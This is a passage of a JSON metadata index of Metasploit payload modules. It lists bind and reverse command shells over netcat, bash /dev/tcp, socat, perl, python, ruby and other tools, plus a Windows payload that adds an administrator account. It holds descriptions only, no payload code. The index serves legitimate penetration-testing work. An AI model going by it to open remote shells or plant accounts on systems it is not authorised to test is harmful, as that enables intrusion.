"path": "/modules/payloads/singles/cmd/unix/bind_awk.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_awk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_busybox_telnetd": {
"name": "Unix Command Shell, Bind TCP (via BusyBox telnetd)",
"full_name": "payload/cmd/unix/bind_busybox_telnetd",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Matthew Kienow <matthew_kienow[AT]rapid7.com>"
],
"description": "Listen for a connection and spawn a command shell via BusyBox telnetd",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-01-03 18:43:51 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_busybox_telnetd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_inetd": {
"name": "Unix Command Shell, Bind TCP (inetd)",
"full_name": "payload/cmd/unix/bind_inetd",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Listen for a connection and spawn a command shell (persistent)",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_inetd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_lua": {
"name": "Unix Command Shell, Bind TCP (via Lua)",
"full_name": "payload/cmd/unix/bind_lua",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "Listen for a connection and spawn a command shell via Lua",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_lua.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_lua",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_netcat": {
"name": "Unix Command Shell, Bind TCP (via netcat)",
"full_name": "payload/cmd/unix/bind_netcat",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"m-1-k-3",
"egypt <egypt@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell via netcat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_netcat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_netcat_gaping": {
"name": "Unix Command Shell, Bind TCP (via netcat -e)",
"full_name": "payload/cmd/unix/bind_netcat_gaping",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Listen for a connection and spawn a command shell via netcat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_netcat_gaping",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_netcat_gaping_ipv6": {
"name": "Unix Command Shell, Bind TCP (via netcat -e) IPv6",
"full_name": "payload/cmd/unix/bind_netcat_gaping_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Listen for a connection and spawn a command shell via netcat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_netcat_gaping_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_nodejs": {
"name": "Unix Command Shell, Bind TCP (via nodejs)",
"full_name": "payload/cmd/unix/bind_nodejs",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Continually listen for a connection and spawn a command shell via nodejs",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-10-11 11:09:28 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_nodejs.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_nodejs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_perl": {
"name": "Unix Command Shell, Bind TCP (via Perl)",
"full_name": "payload/cmd/unix/bind_perl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Samy <samy@samy.pl>",
"cazz <bmc@shmoo.com>"
],
"description": "Listen for a connection and spawn a command shell via perl",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_perl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_perl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_perl_ipv6": {
"name": "Unix Command Shell, Bind TCP (via perl) IPv6",
"full_name": "payload/cmd/unix/bind_perl_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Samy <samy@samy.pl>",
"cazz <bmc@shmoo.com>"
],
"description": "Listen for a connection and spawn a command shell via perl",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_perl_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_r": {
"name": "Unix Command Shell, Bind TCP (via R)",
"full_name": "payload/cmd/unix/bind_r",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Continually listen for a connection and spawn a command shell via R",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-28 05:30:30 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_r.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_r",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_ruby": {
"name": "Unix Command Shell, Bind TCP (via Ruby)",
"full_name": "payload/cmd/unix/bind_ruby",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Continually listen for a connection and spawn a command shell via Ruby",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_ruby.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_ruby",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_ruby_ipv6": {
"name": "Unix Command Shell, Bind TCP (via Ruby) IPv6",
"full_name": "payload/cmd/unix/bind_ruby_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Continually listen for a connection and spawn a command shell via Ruby",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_ruby_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_socat_udp": {
"name": "Unix Command Shell, Bind UDP (via socat)",
"full_name": "payload/cmd/unix/bind_socat_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "Creates an interactive shell via socat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_socat_udp.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_socat_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_stub": {
"name": "Unix Command Shell, Bind TCP (stub)",
"full_name": "payload/cmd/unix/bind_stub",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Listen for a connection and spawn a command shell (stub only, no payload)",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-12-28 16:21:37 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_stub.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_stub",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/bind_zsh": {
"name": "Unix Command Shell, Bind TCP (via Zsh)",
"full_name": "payload/cmd/unix/bind_zsh",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Doug Prostko <dougtko@gmail.com>",
"Wang Yihang <wangyihanger@gmail.com>"
],
"description": "Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is\n often available, please be aware it isn't usually installed by default.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-15 19:42:39 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_zsh.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_zsh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/generic": {
"name": "Unix Command, Generic Command Execution",
"full_name": "payload/cmd/unix/generic",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Executes the supplied command",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/generic.rb",
"is_install_path": true,
"ref_name": "cmd/unix/generic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/interact": {
"name": "Unix Command, Interact with Established Connection",
"full_name": "payload/cmd/unix/interact",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Interacts with a shell on an established socket connection",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/interact.rb",
"is_install_path": true,
"ref_name": "cmd/unix/interact",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse": {
"name": "Unix Command Shell, Double Reverse TCP (telnet)",
"full_name": "payload/cmd/unix/reverse",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Creates an interactive shell through two inbound connections",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_awk": {
"name": "Unix Command Shell, Reverse TCP (via AWK)",
"full_name": "payload/cmd/unix/reverse_awk",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"espreto <robertoespreto@gmail.com>",
"Ulisses Castro <uss.thebug@gmail.com>",
"Gabriel Quadros <gquadrossilva@gmail.com>"
],
"description": "Creates an interactive shell via GNU AWK",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-16 04:06:58 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_awk.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_awk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_bash": {
"name": "Unix Command Shell, Reverse TCP (/dev/tcp)",
"full_name": "payload/cmd/unix/reverse_bash",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Creates an interactive shell via bash's builtin /dev/tcp.\n\n This will not work on circa 2009 and older Debian-based Linux\n distributions (including Ubuntu) because they compile bash\n without the /dev/tcp feature.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-07-10 18:34:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_bash.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_bash",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_bash_telnet_ssl": {
"name": "Unix Command Shell, Reverse TCP SSL (telnet)",
"full_name": "payload/cmd/unix/reverse_bash_telnet_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Creates an interactive shell via mkfifo and telnet.\n This method works on Debian and other systems compiled\n without /dev/tcp support. This module uses the '-z'\n option included on some systems to encrypt using SSL.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-15 20:50:30 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_bash_telnet_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_ksh": {
"name": "Unix Command Shell, Reverse TCP (via Ksh)",
"full_name": "payload/cmd/unix/reverse_ksh",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Wang Yihang <wangyihanger@gmail.com>"
],
"description": "Connect back and create a command shell via Ksh. Note: Although Ksh is often\n available, please be aware it isn't usually installed by default.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-15 19:56:55 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_ksh.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_ksh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_lua": {
"name": "Unix Command Shell, Reverse TCP (via Lua)",
"full_name": "payload/cmd/unix/reverse_lua",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "Creates an interactive shell via Lua",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_lua.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_lua",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_ncat_ssl": {
"name": "Unix Command Shell, Reverse TCP (via ncat)",
"full_name": "payload/cmd/unix/reverse_ncat_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"C_Sto"
],
"description": "Creates an interactive shell via ncat, utilizing ssl mode",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_ncat_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_netcat": {
"name": "Unix Command Shell, Reverse TCP (via netcat)",
"full_name": "payload/cmd/unix/reverse_netcat",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"m-1-k-3",
"egypt <egypt@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Creates an interactive shell via netcat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-23 18:00:02 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_netcat.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_netcat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_netcat_gaping": {
"name": "Unix Command Shell, Reverse TCP (via netcat -e)",
"full_name": "payload/cmd/unix/reverse_netcat_gaping",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Creates an interactive shell via netcat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-23 18:00:02 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_netcat_gaping",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_nodejs": {
"name": "Unix Command Shell, Reverse TCP (via nodejs)",
"full_name": "payload/cmd/unix/reverse_nodejs",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Continually listen for a connection and spawn a command shell via nodejs",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_nodejs.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_nodejs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_openssl": {
"name": "Unix Command Shell, Double Reverse TCP SSL (openssl)",
"full_name": "payload/cmd/unix/reverse_openssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Creates an interactive shell through two inbound connections",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_openssl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_openssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_perl": {
"name": "Unix Command Shell, Reverse TCP (via Perl)",
"full_name": "payload/cmd/unix/reverse_perl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"cazz <bmc@shmoo.com>"
],
"description": "Creates an interactive shell via perl",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_perl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_perl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_perl_ssl": {
"name": "Unix Command Shell, Reverse TCP SSL (via perl)",
"full_name": "payload/cmd/unix/reverse_perl_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Creates an interactive shell via perl, uses SSL",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_perl_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_php_ssl": {
"name": "Unix Command Shell, Reverse TCP SSL (via php)",
"full_name": "payload/cmd/unix/reverse_php_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Creates an interactive shell via php, uses SSL",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-19 15:49:46 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_php_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_python": {
"name": "Unix Command Shell, Reverse TCP (via Python)",
"full_name": "payload/cmd/unix/reverse_python",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "Connect back and create a command shell via Python",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_python.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_python",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_python_ssl": {
"name": "Unix Command Shell, Reverse TCP SSL (via python)",
"full_name": "payload/cmd/unix/reverse_python_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Creates an interactive shell via python, uses SSL, encodes with base64 by design.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_python_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_r": {
"name": "Unix Command Shell, Reverse TCP (via R)",
"full_name": "payload/cmd/unix/reverse_r",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Connect back and create a command shell via R",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-28 05:30:30 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_r.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_r",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_ruby": {
"name": "Unix Command Shell, Reverse TCP (via Ruby)",
"full_name": "payload/cmd/unix/reverse_ruby",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Connect back and create a command shell via Ruby",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_ruby.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_ruby",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_ruby_ssl": {
"name": "Unix Command Shell, Reverse TCP SSL (via Ruby)",
"full_name": "payload/cmd/unix/reverse_ruby_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Connect back and create a command shell via Ruby, uses SSL",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_ruby_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_socat_udp": {
"name": "Unix Command Shell, Reverse UDP (via socat)",
"full_name": "payload/cmd/unix/reverse_socat_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "Creates an interactive shell via socat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_socat_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_ssl_double_telnet": {
"name": "Unix Command Shell, Double Reverse TCP SSL (telnet)",
"full_name": "payload/cmd/unix/reverse_ssl_double_telnet",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>",
"RageLtMan"
],
"description": "Creates an interactive shell through two inbound connections, encrypts using SSL via \"-z\" option",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_ssl_double_telnet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_stub": {
"name": "Unix Command Shell, Reverse TCP (stub)",
"full_name": "payload/cmd/unix/reverse_stub",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Creates an interactive shell through an inbound connection (stub only, no payload)",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-12-28 16:21:37 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_stub.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_stub",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_zsh": {
"name": "Unix Command Shell, Reverse TCP (via Zsh)",
"full_name": "payload/cmd/unix/reverse_zsh",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Doug Prostko <dougtko@gmail.com>",
"Wang Yihang <wangyihanger@gmail.com>"
],
"description": "Connect back and create a command shell via Zsh. Note: Although Zsh is often\n available, please be aware it isn't usually installed by default.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-15 19:42:39 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_zsh.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_zsh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/adduser": {
"name": "Windows Execute net user /ADD CMD",
"full_name": "payload/cmd/windows/adduser",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>",
"scriptjunkie",
"Chris John Riley"
],
"description": "Create a new user and add them to local administration group.\n\n Note: The specified password is checked for common complexity\n requirements to prevent the target machine rejecting the user\n for failing to meet policy requirements.\n\n Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/adduser.rb",
"is_install_path": true,
"ref_name": "cmd/windows/adduser",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_cmd/windows/bind_lua": {
"name": "Windows Command Shell, Bind TCP (via Lua)",
"full_name": "payload/cmd/windows/bind_lua",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "Listen for a connection and spawn a command shell via Lua",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/bind_lua.rb",
"is_install_path": true,
"ref_name": "cmd/windows/bind_lua",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/bind_perl": {
"name": "Windows Command Shell, Bind TCP (via Perl)",
"full_name": "payload/cmd/windows/bind_perl",
"rank": 300,
